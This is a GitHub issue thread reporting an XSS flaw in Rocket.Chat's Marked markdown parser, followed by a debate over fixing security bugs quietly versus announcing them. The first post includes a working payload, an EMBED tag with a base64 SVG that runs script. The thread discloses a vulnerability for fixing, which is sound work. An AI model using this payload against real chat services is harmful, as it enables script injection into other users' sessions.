### ISSUE TITLE
[URGENT] XSS possible with Marked markdown parser

### ISSUE THREAD

**Issue by Lemmmy** [RocketChat/Rocket.Chat#8155]
The Marked markdown parser allows some HTML to be entered. This allows an XSS by sending the following text as a message:

```<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>```

There are possibly more XSSes available.

**Comment by rodrigok** [comment]
Will be fixed discreetly by this PR https://github.com/RocketChat/Rocket.Chat/pull/8372

**Comment by TwizzyDizzy** [comment]
Just my two cents: "discreetly" is nothing that works too well in a security context ;)

**Comment by TwizzyDizzy** [comment]
Well... the criticality of a security issue just doesn't depend on whether it is known or not. In that context I just found the word "discreetly" irritating.

Glad though, that this issue is fixed :)

**Comment by rodrigok** [comment]
I can't understand you, do you prefer a more clear announcement about the fix or more hidden?

This issue is not critical cuz it affects an experimental option disabled by default, with that in mind there is no need to hide the solution, but in my opinion is always good to keep security fixes out of the spotlights.

But let me know if I'm misunderstanding something, we always need to improve 😄

**Comment by TwizzyDizzy** [comment]
> I can't understand you, do you prefer a more clear announcement about the fix or more hidden?

I'm sorry, I didn't want to cause any fuzz. After having thought about your question: yes, a kind of security announcement habit would, in general, be something I would appreciate. Even though this concerns an option that is disabled by default, one would assume that it would still be important to get this information to people

* who have enabled it
* who have disabled it but want to enable it but are still on a version that doesn't incorporate the fix
* who are interested in the security of Rocket.Chat

So some kind of announcement channel (not as in "chat room") would be a good idea.

Because

> but in my opinion is always good to keep security fixes out of the spotlights.

THIS is definately something that is not regarded as being true. Please refer to: https://en.wikipedia.org/wiki/Security_through_obscurity

> Security experts have rejected this view as far back as 1851, and advise that obscurity should never be the only security mechanism.

You may argue, that it is not the only security mechanism, but the overall principle still applies.

Cheers
Thomas
